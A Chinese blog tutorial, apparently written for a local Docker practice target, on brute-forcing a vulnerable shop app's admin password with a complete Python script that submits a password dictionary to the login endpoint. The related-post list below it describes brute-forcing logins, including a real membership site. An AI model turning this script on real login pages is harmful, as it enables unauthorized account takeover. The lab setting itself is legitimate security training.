用python写一个爆破网站管理员密码脚本

已于 2023-11-05 20:23:28 修改
阅读量2.4k 收藏 2
点赞数
分类专栏: 安全 Python Python脚本 文章标签: python 开发语言 安全 web安全 暴力破解
于 2023-11-05 19:46:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/134233678
版权
安全 同时被 3 个专栏收录
8 篇文章 1 订阅
订阅专栏
Python
5 篇文章 2 订阅
订阅专栏
Python脚本
3 篇文章 9 订阅
订阅专栏

文章目录

拉取环境

靶场环境是docker环境,把docker靶场映射到本机的7777端口,以便访问

docker pull docker.io/zksmile/vul
docker run -d -p 7777:80 --name shop zksmile/vul:secshop_v2

首页:

在这里插入图片描述

寻找登录界面

在注用户注册页面发现admin不能注册,猜测admin为管理员账户

在这里插入图片描述

通过爆破目录发现 192.168.171.102:7777/admin.php 为管理登录界面

在这里插入图片描述

寻找参数

用burp拦截观察http数据包,关于burp的使用可以看这篇文章 DVWA 暴力破解

在这里插入图片描述

可以看到用户名密码是用post传输的,密码错误的响应值是 -1,猜测密码正确的话返回值是1

编写脚本

根据以上这些信息进行编写python脚本,代码解释我放到注释里了:

import sys
import requests
import json

logo = r"""
 ____             _         _____                  
| __ ) _ __ _   _| |_ ___  |  ___|__  _ __ ___ ___ 
|  _ \| '__| | | | __/ _ \ | |_ / _ \| '__/ __/ _ \
| |_) | |  | |_| | ||  __/ |  _| (_) | | | (_|  __/
|____/|_|   \__,_|\__\___| |_|  \___/|_|  \___\___|
"""
def brute(url, header ,params):
    i = 0

    #查看文件行数
    with open('passwd.txt','r') as f:
        global lines
        lines = f.readlines()
        lines = str(len(lines))
    username = 'admin'    #这里username是固定的

    #打开密码字典文件
    for passwd in open("passwd.txt"):
        i += 1
        password = passwd.strip()   #strip删除开头和结尾的空格
        payload = {                 #指定post发送的数据
            'loginName':username,
            'loginPwd':password,
            'verify':'DGHA'
        }
        #发送post请求
        response = requests.post(url=url, data=payload, params=params, headers=header)
        #获取结果
        result = json.loads(response.content)

        #如果结果值为1,则密码正确,退出程序!!!
        if result["status"] == 1:
            print('------------------------------------')
            print("\033[92m" + 'password is : ' + password + '\n' + "\033[0m")
            sys.exit()
        #输出测试值
        print("\033[91m" + '[*]' + str(i) + '/'+ lines + ' ' + password + "\033[0m",end='\r')
    return i

def main():
    print(logo)
    #proxies = {'http':'http://127.0.0.1:8080'}
    url = "http://192.168.171.102:7777/index.php"
    #指定user_agent和cookie
    header = {
        'User_Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
        'Cookie':'areaId2=110100; WSTMALLviewGoods=think%3A%5B%22102%22%2C%22258%22%2C%22103%22%2C%22101%22%2C%22101%2Bor%2B1%253D1%22%2C%2287654%2Bor%2B1%253D1%22%2C%22101%2Border%2Bby%2B1%22%2C%22101%2Border%2Bby%2B10%22%2C%22101%2Border%2Bby%2B30%22%2C%22101%2Border%2Bby%2B300%22%2C%22101%2Border%2Bby%2B30000%22%2C%22101%2B%2Band%2B1%253D1%22%2C%22260%22%2C%22101%2Band%2B1%253D1%22%2C%22110%22%5D; loginName=test1; loginPwd=NWExMDVlOGI5ZDQwZTEzMjk3ODBkNjJlYTIyNjVkOGE%3D; PHPSESSID=88sjapamh02cbo40fcj9flc1j5; WSTMALLbstreesAreaId3=110101'
    }
    #指定get方式传参的值
    params = {'m':'Admin','c':'index','a':'login'}
    i = brute(url, header, params)
    print('-----------------------------------------------------')
    print("\033[91m" +'尝试了' + str(i) + '次,字典中没有正确密码!' + "\033[0m")

if __name__ == "__main__":
    main()

试验效果

在这里插入图片描述
在这里插入图片描述

密码错误效果:

在这里插入图片描述

CVE-柠檬i
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python爆破示例_用python爆破某会员网站
weixin_33335559的博客
01-12 632
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python网站登录爆破登录_用python爆破某会员网站
weixin_42360788的博客
02-04 721
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python登录网页账号密码,python网站登录爆破登录
zjl102562的博客
04-07 244
在本篇文章中,我们将介绍如何使用Python代码来实现网站自动登录的功能。我们将使用Python的第三方库来处理网络请求和HTML解析,以便实现自动登录的过程。首先,我们需要安装所需的Python库,这些库将帮助我们处理网络请求和HTML解析。安装完成后,我们可以开始编自动登录的代码。以下是一个示例代码,展示了如何使用Python来自动登录一个网站Python实现网站自动登录。
pythonWEB登录密码暴力破解
HTTP协议01
05-06 7551
原理:利用字典爆破进行破解 实验环境:本机Win10(python3.7环境)、虚拟机Win2003(搭建DVWA网站) 工具:火狐浏览器、Burp Suite 实现步骤: 1、获取正常登录时需要提交的数据信息。 Burp Suite开启抓包,浏览器范文Dvwa登录页面,按F12开启网络数据查看器,登录dvwa. 可知:username、passwo...
Python开发:简单的密码爆破工具
最新发布
爱玩游戏的黑客的博客
05-29 1018
记得有大佬曾经说过:一个系统的突破往往是从弱口令开始,为了拿到弱口令我们就需要了解密码破解技术。密码破解主要分为离线密码破解和在线密码破解。在平时渗透时我们通常遇到的就是在线密码破解,破解对象包括各类系统服务以及各种网站应用,当我们面对rdp、ftp、ssh等服务,一般情况下可使用 hydra、超级弱口令爆破工具进行破解;而假如面对的是网站应用,最常用到的就是 BurpSuite、wfuzz。
网页密码暴力破解模板,多线程-python
09-05
网页密码暴力破解模板,用python2编,多线程,可自己调节线程,只是一个模板,需要自己修改里面的关键字,内容等。
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2209
简单对靶向网站进行暴力破解的简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破解......
Python暴力破解密码
热门推荐
we chat:玩转测试开发
02-13 1万+
简介:暴力破解密码的方式一般是枚举法进行破译尝试,通过一次次不同的输入尝试从而得出最终的密码,所以密码的长度和复杂性就尤为重要。本文仅以范例,警示大家在创建密码的时候,应当尽量选择组合复杂度高的,有一定长度的密码,而不是123456之类的简单密码。 破解的思路: 1、获取目标密码长度,一般为4,6,12,15,18位长度。 2、获取目标密码组成的范围,一般为数字,小字母,大字母,特殊符号 3、组装密码,通过itertools模块组装。Python:常见排列组合问题处理 4、枚举破译。 例如生活中最常见的
python暴破服务器用户密码
qq_69613156的博客
11-08 822
python脚本,暴破web服务器里面的用户名及密码信息。包括已知用户名情况,和未知用户名情况。
Python暴力破解网站登录密码脚本
xff123456_的博客
06-14 1826
测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级关键代码解释url指定url地址 header设置请求头 payload设置请求参数 这一行的作用是做一次get请求,响应信息被变量Response接收 这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解这种方式和burp的Intruder模块的Cluster bomb攻击方式一样 然后把循环结果存放到csv文件里,用逗号分割数据Response.status_code是响应的http状态码,len(Response
python之——使用python爆破脚本
12-21
此处以dvwa网站密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): ""...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
根据指定hash值寻键爆破脚本Python实现)
08-22
在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解成功。 在本...
python制作企业邮箱的爆破脚本
12-23
按照师傅给的任务,一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破脚本。 我先说下整体思路: 总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,...
python字典爆破网站登录|思路
向阳-Y.的博客
10-31 1640
在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!! 如果有好用的爆破工具,欢迎大佬推荐~
python网站登录爆破登录_看我如何爆破加密的web登录表单
weixin_39915078的博客
12-17 666
有很多方法来爆破登录表单,你只需要 google 一下就可以在搜索的结果中看到一些通常的做法。在你使用 Burp 的情况下,这些搜索出来的爆破方式将足以满足大多数的形式爆破。但有时候,爆破不会那么简单,你需要编自己的工具。这可能是因为一些各种原因所致,但通常它归结为通过 HTTP(S)的自定义协议或输入的数据的是一些自定义的加密算法。在这篇文章中,我们将介绍两种编这些工具的方法:1. 编你自...
Python脚本--shadow密码爆破
m0_62202418的博客
11-26 396
【代码】Python脚本--shadow密码爆破
python暴力破解密码
m0_72398286的博客
09-03 4163
【代码】python暴力破解密码
帮我用python一个目录爆破脚本
04-12
好的,我可以帮你一个目录爆破脚本。你可以使用 Python 的 requests 或 urllib 库来发送 HTTP 请求,并使用 os 模块来处理目录列表。以下是一个简单的示例脚本: ```python import requests import os base_url = 'http://example.com/' # 从文件中读取目录列表 with open('directory-list.txt', 'r') as f: dirs = [line.strip() for line in f.readlines()] for dir in dirs: url = base_url + dir response = requests.get(url) if response.status_code == 200: print('Found: ', url) ``` 你需要将 `base_url` 更改为你要进行目录爆破网站 URL,还需要创建一个包含目录列表的文件名为 `directory-list.txt`。当然,这只是一个简单的示例,你可以根据自己的需要进行修改和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值